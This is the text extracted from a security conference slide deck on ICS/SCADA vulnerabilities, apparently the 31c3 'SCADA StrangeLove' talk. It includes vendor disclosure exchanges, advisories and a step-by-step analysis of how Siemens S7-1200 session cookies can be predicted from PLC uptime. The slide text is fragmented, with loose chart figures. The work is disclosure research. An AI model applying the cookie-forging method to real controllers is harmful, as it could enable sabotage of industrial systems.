SCADA StrangeLove: Too Smart Grid in da Cloud [31c3]

*All pictures are taken from Dr StrangeLove movie and other Internets

Sergey GordeychikAleksandr Timorin

Group of security researchers focused on ICS/SCADA

to save Humanity from industrial disaster

and to keep Purity Of Essence

Alexander TimorinAlexander TlyapovAlexander ZaitsevAlexey OsipovAndrey MedovArtem ChaykinDenis BaranovDmitry EfanovDmitry Nagibin

Dmitry SerebryannikovDmitry SklyarovEvgeny ErmakovGleb GritsaiIlya KarpovIvan PoliyanchukKirill NesterovRoman IlinSergey Bobrov

Sergey DrozdovSergey GordeychikSergey ScherbelTimur YunusovValentin ShilnenkovVladimir KochetkovVyacheslav EgoshinYuri GoltsevYuriy Dyachenko

https://icsmap.shodan.io/

― Google dorks

― Configuration scripts

― FS structure

― etc

--snip--

Comment to PT-SOL-2014001:The upload path has been changed. It is still possible to upload files, but they can't overwrite system critical parts any more.

Comment to PT-SOL-2014002:The system backup is created in a randomly chosen path an deleted afterwards. Therefore an unauthorized access is made much more difficult and very unlikely.

Second comment to PT-SOL-2014002:In order to compensate the weak encryption in the configuration file, the whole configuration file is now encrypted via the new HTTP transmission.

--snip--

To hack what? Grandmom’s reel 2 reel recorder?

Spot the Similarities

Popular HMI

Relatively new system

Platform independent

Custom webserver

http://cvedetails.com for Apache HTTP Server

http://www.digitalbond.com/blog/2013/03/21/s4x13-video-wincc-under-x-rays-by-sergey-gordeychik/

1 2 9 7 6 10 11 14 17

73 100 96

899

94135

285

81

0

100

200

300

400

500

600

700

800

900

1000

1997 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2011 2012 2013

PLC1 PLC2 PLC3

Some networ

ks

WinCC Web-

Client

WinCC SCADA-Clients

WinCC SCADA-Client +Web-Server

WinCC DataMonitor

WinCC Web-Client

WinCC DataMonitor

WinCC Servers

LAN

PROFINET

PROFIBUS

Internet, corp lan, vpn’s

Engineering station(TIA portal/PCS7)

WinCCExplorer.exe/PdlRt.exe

+1337

PmzR9733Q8rG3LpwjCGZT9N/ocMAAQABAAKK1woAqsgAAAAAAAAAAIrXIUM=

uLiHXZUTy2GMgjr1KmgmcNN/ocMAAQACAAKK1woAqsgAAAAAAAAAAIrXIUM=

Mu/vgiIgtrxq0LVp26nkMtN/ocMAAQADAAKK1woAqsgAAAAAAAAAAIrXIUM=

tjH6vtNWCfa+QZHPDtCnKdN/ocMAAgADAAKK1woAqsgAAAAAAAAAAIrXIUM=

3e6cd1f7bdf743cac6dcba708c21994fd37fa1c30001000100028ad70a00aac800000000000000008ad72143

b8b8875d9513cb618c823af52a682670d37fa1c30001000200028ad70a00aac800000000000000008ad72143

32efef822220b6bc6ad0b569dba9e432d37fa1c30001000300028ad70a00aac800000000000000008ad72143

b631fabed35609f6be4191cf0ed0a729d37fa1c30002000300028ad70a00aac800000000000000008ad72143

3e6cd1f7bdf743cac6dcba708c21994f - MD5 of ? (16 bytes)

d37fa1c3 - CONST (4 bytes)

0001 - user logout counter (2 bytes)

0001 - counter of issued cookies for this user (2 bytes)

00028ad7 - value that doesn’t matter (4 bytes)

0a00aac8 - user IP address (10.0.170.200) (4 bytes)

00000000000000008ad72143 - value that doesn’t matter (12 bytes)

So, what about 3e6cd1f7bdf743cac6dcba708c21994f ???

3e6cd1f7bdf743cac6dcba708c21994fd37fa1c30001000100028ad70a00aac800000000000000008ad72143

3e6cd1f7bdf743cac6dcba708c21994f

MD5( NEXT 26 BYTES OF COOKIE + 16BYTES OF SECRET + 2 NULL BYTES)

What is SECRET ?

SECRET is generates after PLC start by PRNG.

PRNG is a little bit harder than standard C PRNG.

SEED in {0x0000 , 0xFFFF}

It’s too much for bruteforce (PLC so tender >_<)

What about SEED ?SEED very often depends on time value

SEED = PLC START TIME + 320

320 by practical way: secret generates after ~ 3-4 seconds of PLC start using current time

How to obtain PLC START TIME ?

PLC START TIME = CURRENT TIME – UPTIME

Current time

Uptime

SSA-654382 , SSA-456423

Affected devices:

• Siemens S7-1200 PLC

• Siemens S7-1500 PLC

CVSS Base Score: 8.3

SCADASL:13.01.2013

S7 PLC private/public community string for SNMP protocol can't be changed …

Siemens:06.02.2013

… you cannot change the SNMP community string … This issue has no effect on security, as only non-sensitive information can be changed via SNMP. … community strings changeable in TIA Portal v12.5.

SCADASL:05.08.2013

… vulnerabilities related to S7 1500 and S7 1200 PLC in attached file … including hardcoded SNMP.

Siemens:22.10.2013

Hardcoded SNMP strings are in fact an issue …

We might eventually migrate to SNMPv3 …

0

50

100

150

200

250

ABB Advantech Emerson Honeywell Other Siemens Schneider Electric

Total Total Fix Vulns Fixed

PHDays 2013 Choo Choo Choo Pwn

Security assessment/Pentest

PHDays IV Critical Infrastructure Attack

0-day research

http://bit.ly/1t8poTL http://www.phdays.com/press/news/38171/

Goals ICS components 0-day research Make a disaster 0-day/1-day, CVSS, complexity, exploit, practical impact (e.g. disaster)

Mom, I can spoof MODBUS tag = 0 ;)

Tragets Schneider Electric

Wonderware System Platform, Indusoft Web Studio 7.1.4, ClearSCADA, IGSS, MiCOMC264

Siemens Flexible, TIA Portal 13 Pro, WinCC, KTP 600, Simatic S7-1500 (1511-1 PN), S7-300

(314С-2 DP + CP343), S7-1200 v3, S7-1200 v2.2

Rockwell Automation RSLogix 500, Allen-Bradley MicroLogix 1400 1766-L32BWAA

WellinTech KingSCADA, ICONICS Genesis64, ICP DAS PET-7067, KepwareKepServerEX(S7, DNP3), Honeywell Matrikon OPC (Modbus, DNP3) etc.

Winners

1Alisa Esage – SE Indusoft Web Studio 7.1

Nikita Maximov & Pavel Markov - ICP DAS RTU

Dmitry Kazakov - Siemens Simatic S7-1200 PLC

2 days – 10+ 0days

Responsible disclosure: in progress

Fixes?

In 2013 we reported 9 vulnerabilities PT-EMR-DV-13002 World readable/writable *** (CVSSv2 6.8) PT-EMR-DV-13003 World readable *** (CVSSv2 6.8) PT-EMR-DV-13004 Weak cryptography used to store *** (CVSSv2 9.0) PT-EMR-DV-13005 Multiple SQL injections in *** (CVSSv2 10.0) PT-EMR-DV-13006 Weak cryptography used to *** (CVSSv2 6.8) PT-EMR-DV-13007 Memory corruption in *** (CVSSv2 5.0) PT-EMR-DV-13008 Format string vulnerability in *** (CVSSv2 10.0) PT-EMR-DV-13009 Hardcoded access credentials *** (CVSSv2 10.0)

CVSS form 5.0 to 10.0

Advisory (ICSA-14-133-02) Emerson DeltaV v10-12 Vulnerabilities CVE-2014-2349 Configuration File Manipulation Local Privilege

Escalation

CVSSv2 6.2

CVE-2014-2350 Service Processes Default Hardcoded Credentials

CVSSv2 2.4

http://ics-cert.us-cert.gov/advisories/ICSA-14-133-02

1

2

150 freight cars12 500 tonsSeveral locomotives

Safety Integrity Level

Probability of Failure on Demand (PFD)

Probability of Failure per Hour (PFH)

1

2

http://www.theguardian.com/world/2013/jul/25/spain-train-crash-travelling-so-fast

Modern Smart Grid:

- ICS/SCADA

- Mobile carrier

- Billing/Payment

- IoT

-Cloud

Alexander @arbitrarycode Zaitsev

Alexey @GiftsUngiven Osipov

Kirill @k_v_nesterov Nesterov

Dmtry @_Dmit Sklyarov

Timur @a66at Yunusov

Gleb @repdet Gritsai

Dmitry Kurbatov

Sergey Puzankov

Pavel Novikov

*All pictures are taken from Dr StrangeLove movie and other Internets

*All pictures are taken from googleand other Internets

Alexander TimorinAlexander TlyapovAlexander ZaitsevAlexey OsipovAndrey MedovArtem ChaykinDenis BaranovDmitry EfanovDmitry NagibinDmitry SerebryannikovDmitry SklyarovEvgeny ErmakovGleb GritsaiIlya KarpovIvan PoliyanchukKirill NesterovRoman IlinSergey BobrovSergey DrozdovSergey GordeychikSergey ScherbelTimur YunusovValentin ShilnenkovVladimir KochetkovVyacheslav EgoshinYuri GoltsevYuriy Dyachenko